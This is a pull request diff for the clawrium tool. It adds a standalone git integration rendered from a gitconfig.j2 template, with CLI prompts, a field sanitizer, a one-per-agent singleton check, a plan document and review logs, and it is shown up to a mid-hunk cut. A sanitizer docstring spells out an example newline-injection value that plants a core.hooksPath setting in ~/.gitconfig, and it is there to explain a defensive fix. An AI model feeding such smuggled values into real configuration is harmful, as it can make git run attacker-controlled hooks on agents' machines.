### PR TITLE
feat(integrations): standalone git integration with gitconfig.j2 template (#531)

### DIFF
--- a/.itx/431/00_PLAN.md
+++ b/.itx/431/00_PLAN.md
@@ -1,0 +1,277 @@
+# Implementation Plan (Revised) — #431
+
+## Why this plan supersedes the original
+
+The original #431 proposal added two optional fields (`GIT_USER_NAME`,
+`GIT_USER_EMAIL`) to the **github** integration and wrote them via inline
+`git config --global` Ansible commands. Two problems with that shape:
+
+1. **Couples git identity to a forge.** Agents using gitlab, self-hosted
+   git, or no forge at all still need a commit identity. Sticking the
+   fields on `github` strands them.
+2. **Inline `git config` commands are not reviewable.** The agent's
+   `~/.gitconfig` becomes a side-effect of N commands; you cannot diff
+   the file, version it, or extend it with non-identity keys (default
+   branch, pull strategy, editor) without piling on more inline commands.
+
+Issue #531 already proposes the correct shape: a **standalone `git`
+integration** rendered from a Jinja `gitconfig.j2` template. This plan
+adopts #531 as the implementation of #431 and recommends closing #431
+as superseded once #531 ships.
+
+## Token boundary (confirmed)
+
+`gitconfig.j2` never contains a token. The boundary stays:
+
+| Where | What lives there |
+|---|---|
+| `10-<claw>-env.conf` (systemd drop-in, mode 0600) | `GITHUB_TOKEN` env var for the process |
+| `gh` auth store (`~/.config/gh/hosts.yml` per agent user) | OAuth credential, set by `gh auth login --with-token` |
+| `~/.gitconfig` (template-rendered, this plan) | `[user]`, `[init]`, `[pull]`, `[core]` only |
+| `~/.gitconfig` (`gh auth setup-git` writes this on top) | `credential.helper = !gh auth git-credential` — a *pointer*, not a token |
+
+When git needs to push, it invokes `gh auth git-credential`, which reads
+`GITHUB_TOKEN` from env. The token is never serialized to a config file.
+
+## Overview
+
+Implement #531's standalone `git` integration with five fields and sane
+defaults. All three claws (zeroclaw, hermes, openclaw) render
+`gitconfig.j2` during configure for each assigned `git` integration.
+
+## Schema — `src/clawrium/core/integrations.py`
+
+Add a `git` entry to `INTEGRATION_TYPES`:
+
+| Key | Required | Default at prompt | Rendered as |
+|---|---|---|---|
+| `GIT_USER_NAME`           | yes | local `git config --global user.name`  | `[user] name`           |
+| `GIT_USER_EMAIL`          | yes | local `git config --global user.email` | `[user] email`          |
+| `GIT_INIT_DEFAULT_BRANCH` | no  | `main`                                 | `[init] defaultBranch`  |
+| `GIT_PULL_REBASE`         | no  | `false`                                | `[pull] rebase`         |
+| `GIT_CORE_EDITOR`         | no  | `vim`                                  | `[core] editor`         |
+
+Identity is required because an identityless `~/.gitconfig` is the foot-gun
+we are closing. Other fields default at template-render time, so the operator
+can accept blanks at prompt time and still get a working file.
+
+Storage rides the existing per-integration credentials path
+(`secrets.json`). Reusing the credential store avoids inventing a parallel
+"config fields" mechanism. The reuse is acknowledged as a name-fit
+compromise (`GIT_USER_NAME` is not strictly a secret) and is consistent
+with how #431 originally proposed storing the same data.
+
+## CLI — `src/clawrium/cli/integration.py`
+
+`clm integration add --type git <name>` walks the five fields in the
+table order. For each prompt:
+
+- If the field has a function-derived default (the two identity fields),
+  shell out: `subprocess.run(['git', 'config', '--global', '<key>'],
+  capture_output=True)`. On non-zero or `FileNotFoundError`, default to `""`.
+- Static defaults (`main` / `false` / `vim`) pre-populate directly.
+- Operator hits Enter to accept or types to override.
+- For required fields, an empty submission re-prompts.
+
+**Update verb.** Confirm during implementation whether the CLI supports
+updating fields on an existing integration without `remove + re-add`. If
+it doesn't, add an update path in this phase — otherwise live verification
+in Phase 3 has no way to backfill the existing `clawrium-d01-github`
+integration without losing its credentials.
+
+## Template — `src/clawrium/platform/templates/gitconfig.j2`
+
+Single shared template (the rendering is identical across claws —
+co-locating per-claw would be three copies of the same file).
+
+```ini
+[user]
+    name = {{ git.user_name }}
+    email = {{ git.user_email }}
+
+[init]
+    defaultBranch = {{ git.init_default_branch | default('main') }}
+
+[pull]
+    rebase = {{ git.pull_rebase | default('false') }}
+
+[core]
+    editor = {{ git.core_editor | default('vim') }}
+```
+
+Last-write-wins if an operator assigns multiple `git` integrations to one
+agent — same semantics as the existing `GITHUB_TOKEN` drop-in. Document
+it; don't error on it.
+
+## Playbook task — one per claw
+
+Three files, identical task body, positioned **after** the `gh auth
+setup-git` task so the file `gh auth setup-git` mutates is the one this
+template produced (otherwise the credential.helper line gets overwritten
+by the template run):
+
+- `src/clawrium/platform/registry/zeroclaw/playbooks/configure.yaml`
+- `src/clawrium/platform/registry/hermes/playbooks/configure.yaml`
+- `src/clawrium/platform/registry/openclaw/playbooks/configure.yaml`
+
+```yaml
+- name: Render ~/.gitconfig for each git integration
+  become_user: "{{ agent_name }}"
+  ansible.builtin.template:
+    src: gitconfig.j2
+    dest: "/home/{{ agent_name }}/.gitconfig"
+    owner: "{{ agent_name }}"
+    group: "{{ agent_name }}"
+    mode: "0644"
+  loop: "{{ integrations | dict2items | selectattr('value.type', 'equalto', 'git') | list }}"
+  loop_control:
+    label: "{{ item.key }}"
+  vars:
+    git:
+      user_name:            "{{ item.value.GIT_USER_NAME | default('') }}"
+      user_email:           "{{ item.value.GIT_USER_EMAIL | default('') }}"
+      init_default_branch:  "{{ item.value.GIT_INIT_DEFAULT_BRANCH | default('main') }}"
+      pull_rebase:          "{{ item.value.GIT_PULL_REBASE | default('false') }}"
+      core_editor:          "{{ item.value.GIT_CORE_EDITOR | default('vim') }}"
+```
+
+**Ordering pin** — registry tests must assert the render task is positioned
+after `Configure git credential helper via gh auth setup-git`. Reverse
+order silently drops the credential.helper line.
+
+**No-op when no `git` integration is assigned** — the `selectattr` filter
+returns an empty list and the loop becomes a no-op. Existing agents
+unchanged.
+
+## Test strategy
+
+**`tests/test_core_integrations.py`**
+- `test_git_integration_exposes_five_fields_with_required_flags`
+- `test_git_integration_required_fields_are_only_user_name_and_email`
+- `test_other_integration_types_do_not_expose_git_fields`
+- `test_legacy_integrations_without_git_type_load_cleanly`
+
+**`tests/test_cli_integration.py`**
+- `test_git_add_prefills_identity_from_local_git_config` — patch
+  `subprocess.run` to return canned name/email.
+- `test_git_add_handles_missing_local_git_config` — `subprocess.run` returns
+  empty / non-zero; required prompts re-prompt; static defaults still applied.
+- `test_git_add_applies_static_defaults_for_optional_fields` — assert
+  `main`/`false`/`vim` show as prompt defaults.
+- `test_git_add_operator_override_persists` — operator types non-default
+  values; assert they land in the integration record.
+
+**Playbook structural tests** — extend per claw:
+- `tests/test_registry_zeroclaw.py`
+- `tests/test_registry_hermes.py` (create if absent)
+- `tests/test_registry_openclaw.py` (create if absent)
+
+Each asserts:
+- Render task present, gated on `type == 'git'`, runs as
+  `become_user: "{{ agent_name }}"`.
+- Positioned **after** the `gh auth setup-git` task.
+- `dest`, `owner`, `group`, `mode` match the spec above.
+
+**Template render test** — new `tests/test_gitconfig_template.py`:
+- `test_renders_full_input` — all five fields set; assert exact file body.
+- `test_renders_identity_only_with_defaults` — only the two required fields
+  set; assert `main`/`false`/`vim` come through.
+
+## Phasing
+
+### Phase 1 — Schema + CLI prompt + template (no playbook side effects)
+
+**Files**
+- `src/clawrium/core/integrations.py` — add `git` entry.
+- `src/clawrium/cli/integration.py` — add prompt flow with local-git defaults.
+- `src/clawrium/platform/templates/gitconfig.j2` — new shared template.
+
+**Tests** — all `tests/test_core_integrations.py`,
+`tests/test_cli_integration.py`, and `tests/test_gitconfig_template.py`
+cases from above.
+
+**Exit criteria**
+- `make test` green.
+- `clm integration add --type git foo` walks the five prompts with defaults.
+- Rendering `gitconfig.j2` standalone produces the expected file.
+- Zero behavioural change on any agent on disk.
+
+### Phase 2 — Per-claw playbook render task
+
+**Files** — three `configure.yaml`s (one per claw), one new task each.
+
+**Tests** — three `tests/test_registry_<claw>.py` cases.
+
+**Exit criteria per claw**
+- `make test` green.
+- Live: `printf '9\n' | clm agent configure clawrium-d01 --stage providers`,
+  then `sudo cat /home/clawrium-d01/.gitconfig` matches the integration's fields.
+
+### Phase 3 — Live verification + close #431
+
+1. Backfill the existing `clawrium-d01-github` integration's identity into a
+   new `git`-type integration (e.g. `clawrium-d01-git`) via the new CLI prompts.
+2. Attach the `git` integration to `clawrium-d01`.
+3. Reinstall clm: `uv tool install --force --reinstall .`
+4. `clm agent configure clawrium-d01 --stage providers`.
+5. `sudo cat /home/clawrium-d01/.gitconfig` — verify all five keys, written by
+   ansible (not by the earlier manual edit).
+6. Optional: fresh hermes / openclaw agent to confirm cross-claw parity.
+7. Close #431 as superseded by #531. Reference this plan in the closing
+   comment so the linkage is obvious in history.
+
+**Exit criteria**
+- Acceptance criteria boxes on #531 all checked.
+- `make test` and `make lint` green.
+- #431 closed with a forward pointer to the merged #531 PR.
+
+## Subtasks
+
+Recommend creating three subtask issues under #531 (not #431, since #431
+is being closed):
+
+- `[Parent #531] Phase 1 — git integration schema, CLI prompts, gitconfig.j2 template`
+- `[Parent #531] Phase 2 — Render gitconfig.j2 in zeroclaw / hermes / openclaw configure.yaml`
+- `[Parent #531] Phase 3 — Live verify on clawrium-d01 and close #431`
+
+## Risks & open questions
+
+1. **Update verb on `clm integration`.** If absent, Phase 1 must add it —
+   otherwise Phase 3's backfill requires `remove + re-add`, which destroys
+   credentials. Investigate during Phase 1.
+2. **Field naming.** `GIT_USER_NAME` etc. use the shouty-case credential
+   convention even though these aren't credentials. Trade-off accepted:
+   one storage surface (`secrets.json`) is simpler than two.
+3. **Empty-value semantics.** If the operator clears a previously-set field
+   and re-configures, this plan does **not** `git config --unset`. Empty
+   value = template renders the default. Explicit unset is a follow-up.
+4. **Per-claw identity divergence.** Multiple `git` integrations attached
+   to one agent → last-write-wins on `~/.gitconfig`. For true per-agent
+   identity, attach distinct `git` integrations to distinct agents. Same
+   constraint applies to #431's original design.
+5. **Hermes task ordering density.** Hermes' `configure.yaml` interleaves
+   atlassian MCP bootstrap. Pin the position in the registry test —
+   directly after `gh auth setup-git`, before atlassian.
+
+## Out of scope (unchanged from #531)
+
+- GPG / SSH commit signing.
+- Per-claw identity divergence within a single integration.
+- Migrating existing manual `~/.gitconfig` writes into integration records.
+- `credential.helper` / token-based HTTPS push wiring (lives with #432).
+- Touching any `*-env.conf.j2`.
+
+## Prompt Log
+
+## Planning (revised)
+
+**Stage**: plan
+**Skill**: /itx:plan-create
+**Timestamp**: 2026-05-25T00:00:00Z
+**Model**: claude-opus-4-7
+
+```prompt
+431. the existing issue suggets moving thse configuration as part of git config command. but i want these to be part of gitconfig file. with sane defaults. look at linked issue as well. give me updated plan
+```
+
+**Output**: Revised plan that adopts #531's standalone `git` integration + `gitconfig.j2` template approach as the implementation of #431, and recommends closing #431 as superseded once #531 ships. Confirms token boundary: no token in any rendered config file.

--- a/.itx/431/atx-session.json
+++ b/.itx/431/atx-session.json
@@ -2,26 +2,10 @@
   "transport": "cli",
   "pr": 534,
   "iterations": [
-    {
-      "iteration": 1,
-      "commit_sha": "f04bc1bab7fe8bb30ad1d7e820e54cb8e4842b4d",
-      "rating": 2,
-      "review_cost_usd": 3.46,
-      "duration_sec": 563,
-      "outcome": "fixed: B1/B3 newline injection, B2 singleton (CLI-level), mode 0600; B4 false-positive from stale branch base"
-    },
-    {
-      "iteration": 2,
-      "commit_sha": "616cf9b",
-      "rating": 3,
-      "review_cost_usd": 2.57,
-      "duration_sec": 373,
-      "outcome": "iter-2 NB-1 (singleton TOCTOU) + NB-2 (3 test gaps) addressed in iter-3"
-    },
-    {
-      "iteration": 3,
-      "commit_sha": "pending",
-      "outcome": "moved singleton into add_agent_integration updater closure (IntegrationSingletonViolation), added T1/T3 tests, parametrized template tests across all 5 fields, LF injection test, NUL byte tests, no_log on all 3 playbook gitconfig tasks, post-sanitization truthiness recheck, stronger singleton hint assertion, direct-API singleton test"
-    }
-  ]
+    {"iteration": 1, "commit_sha": "f04bc1b", "rating": 2, "cost_usd": 3.46, "outcome": "iter-1 B1/B2/B3 fixed; B4 false-positive (rebase)"},
+    {"iteration": 2, "commit_sha": "616cf9b", "rating": 3, "cost_usd": 2.57, "outcome": "NB-1 (singleton TOCTOU) + NB-2 (3 test gaps) raised; iter-2 fixes in d4a9dac"},
+    {"iteration": 3, "commit_sha": "d4a9dac", "rating": 2, "cost_usd": 2.65, "outcome": "iter-2 NB-1 RESOLVED; NB-2 partially (T1/T3 done, T2 deferred); two new iter-3 blockers (NUL-only required + silent sanitization) fixed in follow-up commit"}
+  ],
+  "ceiling_reached": true,
+  "final_followup_applied": true
 }

--- a/.itx/431/atx-session.json
+++ b/.itx/431/atx-session.json
@@ -1,0 +1,26 @@
+{
+  "transport": "cli",
+  "pr": 534,
+  "iterations": [
+    {
+      "iteration": 1,
+      "commit_sha": "f04bc1bab7fe8bb30ad1d7e820e54cb8e4842b4d",
+      "started_at": "2026-05-26T05:59:58Z",
+      "completed_at": "2026-05-26T06:09:21Z",
+      "review_cost_usd": 3.46,
+      "duration_ms": 563207,
+      "rating": 2,
+      "blockers": [
+        {"id": "B1", "domain": "security", "issue": "gitconfig section injection via unsanitized newline in any of the 5 git fields", "status": "fixed", "resolution": "CLI _sanitize_git_field strips CR/LF/NUL at ingest + template adds replace newline/cr defense-in-depth"},
+        {"id": "B2", "domain": "cli-ux", "issue": "multiple git integrations attached - silent last-wins overwrite of ~/.gitconfig", "status": "fixed", "resolution": "singleton guard in cli/agent.py integrations_add"},
+        {"id": "B3", "domain": "registry/playbooks", "issue": "duplicate of B1 newline injection", "status": "fixed", "resolution": "subsumed by B1 fixes"},
+        {"id": "B4", "domain": "core-lifecycle", "issue": "PR allegedly deletes provider_attachments.py and lifecycle.py multi-provider", "status": "false-positive", "resolution": "diff artifact from stale branch base — rebased onto current origin/main, clean diff confirms no such changes"}
+      ],
+      "warnings_addressed": [
+        "gitconfig mode 0644 to 0600 in all three playbooks",
+        "git added to test_types_lists_all_integrations",
+        "_local_git_config returns first line only"
+      ]
+    }
+  ]
+}

--- a/.itx/431/atx-session.json
+++ b/.itx/431/atx-session.json
@@ -5,22 +5,23 @@
     {
       "iteration": 1,
       "commit_sha": "f04bc1bab7fe8bb30ad1d7e820e54cb8e4842b4d",
-      "started_at": "2026-05-26T05:59:58Z",
-      "completed_at": "2026-05-26T06:09:21Z",
-      "review_cost_usd": 3.46,
-      "duration_ms": 563207,
       "rating": 2,
-      "blockers": [
-        {"id": "B1", "domain": "security", "issue": "gitconfig section injection via unsanitized newline in any of the 5 git fields", "status": "fixed", "resolution": "CLI _sanitize_git_field strips CR/LF/NUL at ingest + template adds replace newline/cr defense-in-depth"},
-        {"id": "B2", "domain": "cli-ux", "issue": "multiple git integrations attached - silent last-wins overwrite of ~/.gitconfig", "status": "fixed", "resolution": "singleton guard in cli/agent.py integrations_add"},
-        {"id": "B3", "domain": "registry/playbooks", "issue": "duplicate of B1 newline injection", "status": "fixed", "resolution": "subsumed by B1 fixes"},
-        {"id": "B4", "domain": "core-lifecycle", "issue": "PR allegedly deletes provider_attachments.py and lifecycle.py multi-provider", "status": "false-positive", "resolution": "diff artifact from stale branch base — rebased onto current origin/main, clean diff confirms no such changes"}
-      ],
-      "warnings_addressed": [
-        "gitconfig mode 0644 to 0600 in all three playbooks",
-        "git added to test_types_lists_all_integrations",
-        "_local_git_config returns first line only"
-      ]
+      "review_cost_usd": 3.46,
+      "duration_sec": 563,
+      "outcome": "fixed: B1/B3 newline injection, B2 singleton (CLI-level), mode 0600; B4 false-positive from stale branch base"
+    },
+    {
+      "iteration": 2,
+      "commit_sha": "616cf9b",
+      "rating": 3,
+      "review_cost_usd": 2.57,
+      "duration_sec": 373,
+      "outcome": "iter-2 NB-1 (singleton TOCTOU) + NB-2 (3 test gaps) addressed in iter-3"
+    },
+    {
+      "iteration": 3,
+      "commit_sha": "pending",
+      "outcome": "moved singleton into add_agent_integration updater closure (IntegrationSingletonViolation), added T1/T3 tests, parametrized template tests across all 5 fields, LF injection test, NUL byte tests, no_log on all 3 playbook gitconfig tasks, post-sanitization truthiness recheck, stronger singleton hint assertion, direct-API singleton test"
     }
   ]
 }

--- a/src/clawrium/cli/agent.py
+++ b/src/clawrium/cli/agent.py
@@ -3087,6 +3087,7 @@ def integrations_add(
     """
     from clawrium.core.integrations import (
         add_agent_integration,
+        get_agent_integrations,
         get_integration,
         IntegrationsFileCorruptedError,
     )
@@ -3111,6 +3112,26 @@ def integrations_add(
         )
         console.print("Use 'clm integration list' to see available integrations")
         raise typer.Exit(code=1)
+
+    # Singleton invariant for `git` integrations: the configure playbook
+    # writes ~/.gitconfig once per assigned git integration, last-write-wins.
+    # Reject the second attach with a clear remediation rather than letting
+    # the operator land in a silent overwrite.
+    if integration.get("type") == "git":
+        existing = get_agent_integrations(hostname, name)
+        for other_name in existing:
+            other = get_integration(other_name)
+            if other and other.get("type") == "git" and other_name != integration_name:
+                console.print(
+                    f"[red]Error:[/red] Agent '{rich_escape(name)}' already has a "
+                    f"git integration assigned ('{rich_escape(other_name)}'). "
+                    "Only one git integration per agent is supported."
+                )
+                console.print(
+                    "[dim]Hint: detach the existing one first with "
+                    f"'clm agent integration remove {rich_escape(name)} {rich_escape(other_name)}'.[/dim]"
+                )
+                raise typer.Exit(code=1)
 
     if add_agent_integration(hostname, name, integration_name):
         console.print(

--- a/src/clawrium/cli/agent.py
+++ b/src/clawrium/cli/agent.py
@@ -3087,9 +3087,9 @@ def integrations_add(
     """
     from clawrium.core.integrations import (
         add_agent_integration,
-        get_agent_integrations,
         get_integration,
         IntegrationsFileCorruptedError,
+        IntegrationSingletonViolation,
     )
     from clawrium.core.secrets import AgentNotFoundError, get_installed_claw
 
@@ -3113,27 +3113,21 @@ def integrations_add(
         console.print("Use 'clm integration list' to see available integrations")
         raise typer.Exit(code=1)
 
-    # Singleton invariant for `git` integrations: the configure playbook
-    # writes ~/.gitconfig once per assigned git integration, last-write-wins.
-    # Reject the second attach with a clear remediation rather than letting
-    # the operator land in a silent overwrite.
-    if integration.get("type") == "git":
-        existing = get_agent_integrations(hostname, name)
-        for other_name in existing:
-            other = get_integration(other_name)
-            if other and other.get("type") == "git" and other_name != integration_name:
-                console.print(
-                    f"[red]Error:[/red] Agent '{rich_escape(name)}' already has a "
-                    f"git integration assigned ('{rich_escape(other_name)}'). "
-                    "Only one git integration per agent is supported."
-                )
-                console.print(
-                    "[dim]Hint: detach the existing one first with "
-                    f"'clm agent integration remove {rich_escape(name)} {rich_escape(other_name)}'.[/dim]"
-                )
-                raise typer.Exit(code=1)
+    # Singleton enforcement happens atomically inside `add_agent_integration`'s
+    # update_host closure (#534 iter-2 NB-1). The CLI just catches and renders
+    # the exception. This closes both the TOCTOU window a CLI pre-check would
+    # leave open AND the direct-API bypass path (e.g. hosts.json edits).
+    try:
+        added = add_agent_integration(hostname, name, integration_name)
+    except IntegrationSingletonViolation as e:
+        console.print(f"[red]Error:[/red] {e}")
+        console.print(
+            "[dim]Hint: detach the existing one first with "
+            f"'clm agent integration remove {rich_escape(claw_name)} {rich_escape(e.existing_name)}'.[/dim]"
+        )
+        raise typer.Exit(code=1)
 
-    if add_agent_integration(hostname, name, integration_name):
+    if added:
         console.print(
             f"[green]Integration '{rich_escape(integration_name)}' assigned to '{rich_escape(name)}'[/green]"
         )

--- a/src/clawrium/cli/integration.py
+++ b/src/clawrium/cli/integration.py
@@ -66,6 +66,18 @@ def _mask_credential(value: str | None) -> str:
     return f"{value[:4]}...{value[-4:]}"
 
 
+def _sanitize_git_field(value: str) -> str:
+    """Strip control characters that would inject gitconfig sections.
+
+    A value like `Alice\n[core]\n    hooksPath = /tmp/evil` rendered into
+    ~/.gitconfig opens a [core] section that git executes on every command.
+    Strip CR/LF/NUL at ingest so the stored secret can never carry an
+    injection payload — the template still defends-in-depth with a Jinja
+    replace filter, but ingest is the right place to make values safe.
+    """
+    return value.replace("\r", "").replace("\n", " ").replace("\x00", "")
+
+
 def _local_git_config(key: str) -> str:
     """Read a value from the operator's local --global git config.
 
@@ -82,7 +94,10 @@ def _local_git_config(key: str) -> str:
         return ""
     if result.returncode != 0:
         return ""
-    return result.stdout.strip()
+    # First line only — gitconfig values can technically be multi-line via
+    # include directives, but for identity fields we want exactly one line.
+    first_line = result.stdout.splitlines()[0] if result.stdout else ""
+    return first_line.strip()
 
 
 # Default values surfaced at prompt-time for the `git` integration.
@@ -280,6 +295,8 @@ def add(
             raise typer.Exit(code=1)
 
         if value:
+            if integration_type == "git":
+                value = _sanitize_git_field(value)
             credentials_to_store.append((key, value, description))
 
     # Build integration record
@@ -541,6 +558,8 @@ def credentials(
             raise typer.Exit(code=1)
 
         if value:
+            if integration_type == "git":
+                value = _sanitize_git_field(value)
             credentials_to_store.append((key, value, description))
 
     # Store updated credentials

--- a/src/clawrium/cli/integration.py
+++ b/src/clawrium/cli/integration.py
@@ -1,5 +1,6 @@
 """Integration management commands for Clawrium."""
 
+import subprocess
 from datetime import datetime, timezone
 
 import typer
@@ -63,6 +64,55 @@ def _mask_credential(value: str | None) -> str:
     if len(value) <= 8:
         return "*" * len(value)
     return f"{value[:4]}...{value[-4:]}"
+
+
+def _local_git_config(key: str) -> str:
+    """Read a value from the operator's local --global git config.
+
+    Returns empty string if git is not installed or the key is unset.
+    """
+    try:
+        result = subprocess.run(
+            ["git", "config", "--global", key],
+            capture_output=True,
+            text=True,
+            timeout=2,
+        )
+    except (FileNotFoundError, subprocess.TimeoutExpired, OSError):
+        return ""
+    if result.returncode != 0:
+        return ""
+    return result.stdout.strip()
+
+
+# Default values surfaced at prompt-time for the `git` integration.
+# Identity defaults shell out to the operator's local --global git config.
+# Static defaults match the template's Jinja default() fallbacks so that
+# accepting the prompt and skipping the prompt produce the same rendered file.
+_GIT_FIELD_DEFAULTS: dict[str, object] = {
+    "GIT_USER_NAME": lambda: _local_git_config("user.name"),
+    "GIT_USER_EMAIL": lambda: _local_git_config("user.email"),
+    "GIT_INIT_DEFAULT_BRANCH": "main",
+    "GIT_PULL_REBASE": "false",
+    "GIT_CORE_EDITOR": "vim",
+}
+
+
+def _resolve_default(integration_type: str, key: str) -> str:
+    """Resolve the prompt-time default for an integration credential.
+
+    Currently only the `git` type carries defaults. Returns empty string
+    when no default applies.
+    """
+    if integration_type != "git":
+        return ""
+    raw = _GIT_FIELD_DEFAULTS.get(key, "")
+    if callable(raw):
+        try:
+            return raw() or ""
+        except Exception:
+            return ""
+    return raw if isinstance(raw, str) else ""
 
 
 def _get_integration_types() -> list[str]:
@@ -212,11 +262,15 @@ def add(
         if not required:
             prompt_text += " (optional)"
 
+        default_value = _resolve_default(integration_type, key)
+
         try:
             if is_sensitive:
-                value = typer.prompt(prompt_text, hide_input=True, default="")
+                value = typer.prompt(
+                    prompt_text, hide_input=True, default=default_value
+                )
             else:
-                value = typer.prompt(prompt_text, default="")
+                value = typer.prompt(prompt_text, default=default_value)
         except (KeyboardInterrupt, EOFError):
             console.print("\nCancelled.")
             raise typer.Exit(code=1)
@@ -463,11 +517,17 @@ def credentials(
         elif not required:
             prompt_text += " (optional)"
 
+        default_value = (
+            "" if has_existing else _resolve_default(integration_type, key)
+        )
+
         try:
             if is_sensitive:
-                value = typer.prompt(prompt_text, hide_input=True, default="")
+                value = typer.prompt(
+                    prompt_text, hide_input=True, default=default_value
+                )
             else:
-                value = typer.prompt(prompt_text, default="")
+                value = typer.prompt(prompt_text, default=default_value)
         except (KeyboardInterrupt, EOFError):
             console.print("\nCancelled.")
             raise typer.Exit(code=1)

--- a/src/clawrium/cli/integration.py
+++ b/src/clawrium/cli/integration.py
@@ -290,19 +290,23 @@ def add(
             console.print("\nCancelled.")
             raise typer.Exit(code=1)
 
+        if integration_type == "git" and value:
+            sanitized = _sanitize_git_field(value)
+            if sanitized != value:
+                console.print(
+                    f"[yellow]Notice:[/yellow] {key} contained control characters "
+                    "(CR/LF/NUL) and was sanitized before storage."
+                )
+            value = sanitized
+
         if required and not value:
-            console.print(f"[red]Error:[/red] {key} is required")
+            console.print(
+                f"[red]Error:[/red] {key} is required (empty after sanitization)"
+            )
             raise typer.Exit(code=1)
 
         if value:
-            if integration_type == "git":
-                value = _sanitize_git_field(value)
-            # Re-check truthiness post-sanitization: a NUL-only payload like
-            # '\\x00' is truthy before strip, empty after. Storing '' as a
-            # credential value would silently land an empty identity field
-            # in ~/.gitconfig (e.g. `name = `), which breaks every commit.
-            if value:
-                credentials_to_store.append((key, value, description))
+            credentials_to_store.append((key, value, description))
 
     # Build integration record
     now = datetime.now(timezone.utc).isoformat()
@@ -558,15 +562,23 @@ def credentials(
         if not value and has_existing:
             continue
 
+        if integration_type == "git" and value:
+            sanitized = _sanitize_git_field(value)
+            if sanitized != value:
+                console.print(
+                    f"[yellow]Notice:[/yellow] {key} contained control characters "
+                    "(CR/LF/NUL) and was sanitized before storage."
+                )
+            value = sanitized
+
         if required and not value and not has_existing:
-            console.print(f"[red]Error:[/red] {key} is required")
+            console.print(
+                f"[red]Error:[/red] {key} is required (empty after sanitization)"
+            )
             raise typer.Exit(code=1)
 
         if value:
-            if integration_type == "git":
-                value = _sanitize_git_field(value)
-            if value:
-                credentials_to_store.append((key, value, description))
+            credentials_to_store.append((key, value, description))
 
     # Store updated credentials
     for key, value, description in credentials_to_store:

--- a/src/clawrium/cli/integration.py
+++ b/src/clawrium/cli/integration.py
@@ -297,7 +297,12 @@ def add(
         if value:
             if integration_type == "git":
                 value = _sanitize_git_field(value)
-            credentials_to_store.append((key, value, description))
+            # Re-check truthiness post-sanitization: a NUL-only payload like
+            # '\\x00' is truthy before strip, empty after. Storing '' as a
+            # credential value would silently land an empty identity field
+            # in ~/.gitconfig (e.g. `name = `), which breaks every commit.
+            if value:
+                credentials_to_store.append((key, value, description))
 
     # Build integration record
     now = datetime.now(timezone.utc).isoformat()
@@ -560,7 +565,8 @@ def credentials(
         if value:
             if integration_type == "git":
                 value = _sanitize_git_field(value)
-            credentials_to_store.append((key, value, description))
+            if value:
+                credentials_to_store.append((key, value, description))
 
     # Store updated credentials
     for key, value, description in credentials_to_store:

--- a/src/clawrium/core/integrations.py
+++ b/src/clawrium/core/integrations.py
@@ -125,6 +125,36 @@ INTEGRATION_TYPES: dict[str, dict] = {
             },
         ],
     },
+    "git": {
+        "description": "Git commit identity and ~/.gitconfig defaults (forge-agnostic)",
+        "credentials": [
+            {
+                "key": "GIT_USER_NAME",
+                "description": "Commit author name (user.name)",
+                "required": True,
+            },
+            {
+                "key": "GIT_USER_EMAIL",
+                "description": "Commit author email (user.email)",
+                "required": True,
+            },
+            {
+                "key": "GIT_INIT_DEFAULT_BRANCH",
+                "description": "Default branch for new repos (init.defaultBranch)",
+                "required": False,
+            },
+            {
+                "key": "GIT_PULL_REBASE",
+                "description": "Whether `git pull` rebases (pull.rebase: true/false)",
+                "required": False,
+            },
+            {
+                "key": "GIT_CORE_EDITOR",
+                "description": "Editor for commit messages (core.editor)",
+                "required": False,
+            },
+        ],
+    },
 }
 
 

--- a/src/clawrium/core/integrations.py
+++ b/src/clawrium/core/integrations.py
@@ -41,7 +41,13 @@ __all__ = [
     "InvalidIntegrationTypeError",
     "InvalidIntegrationNameError",
     "IntegrationInUseError",
+    "IntegrationSingletonViolation",
+    "SINGLETON_INTEGRATION_TYPES",
 ]
+
+# Integration types that cannot be attached more than once per agent.
+# Enforced atomically inside `add_agent_integration`'s update_host closure.
+SINGLETON_INTEGRATION_TYPES = frozenset({"git"})
 
 INTEGRATIONS_FILE = "integrations.json"
 
@@ -186,6 +192,16 @@ class IntegrationInUseError(Exception):
     """Raised when trying to remove an integration that is assigned to agents."""
 
     pass
+
+
+class IntegrationSingletonViolation(Exception):
+    """Raised when a singleton-typed integration (e.g. `git`) would be attached
+    a second time to the same agent. Caught by the CLI to surface a remediation
+    hint pointing at the existing integration."""
+
+    def __init__(self, message: str, existing_name: str):
+        super().__init__(message)
+        self.existing_name = existing_name
 
 
 def validate_integration_name(name: str | None) -> None:
@@ -694,6 +710,18 @@ def add_agent_integration(host: str, claw_name: str, integration_name: str) -> b
 
     hostname = host_data["hostname"]
     added = False
+    singleton_conflict: list[str] = []  # list-as-cell so closure can write
+
+    # Cache the integration map once outside the closure — repeated
+    # load_integrations() inside the closure would hit disk under lock for
+    # every assigned integration on the agent.
+    target_type = None
+    if integration_name:
+        target = next(
+            (i for i in load_integrations() if i.get("name") == integration_name),
+            None,
+        )
+        target_type = (target or {}).get("type")
 
     def updater(h: dict) -> dict:
         nonlocal added
@@ -711,7 +739,19 @@ def add_agent_integration(host: str, claw_name: str, integration_name: str) -> b
             current = []
 
         if integration_name in current:
-            return h  # Already exists
+            return h  # Already exists — idempotent, not a singleton conflict
+
+        # Singleton enforcement: types in SINGLETON_INTEGRATION_TYPES may not be
+        # attached more than once per agent. Executed inside the update_host
+        # closure so the check shares the `_hosts_lock` acquisition with the
+        # write — closes the TOCTOU window a CLI-layer guard could not.
+        if target_type in SINGLETON_INTEGRATION_TYPES:
+            integ_map = {i.get("name"): i for i in load_integrations()}
+            for other_name in current:
+                other = integ_map.get(other_name) or {}
+                if other.get("type") == target_type:
+                    singleton_conflict.append(other_name)
+                    return h  # No-op; caller raises IntegrationSingletonViolation
 
         current.append(integration_name)
         agent_data["integrations"] = current
@@ -719,6 +759,14 @@ def add_agent_integration(host: str, claw_name: str, integration_name: str) -> b
         return h
 
     update_host(hostname, updater)
+
+    if singleton_conflict:
+        raise IntegrationSingletonViolation(
+            f"Agent '{claw_name}' already has a {target_type} integration assigned "
+            f"('{singleton_conflict[0]}'). Only one {target_type} integration per agent is supported.",
+            existing_name=singleton_conflict[0],
+        )
+
     return added
 
 

--- a/src/clawrium/core/lifecycle.py
+++ b/src/clawrium/core/lifecycle.py
@@ -1755,6 +1755,10 @@ def configure_agent(
     if not template_path.exists():
         return False, f"Template directory not found: {template_path}"
 
+    # Shared cross-claw templates (e.g. gitconfig.j2 — issue #531).
+    # Referenced from per-claw playbooks via `{{ shared_template_path }}`.
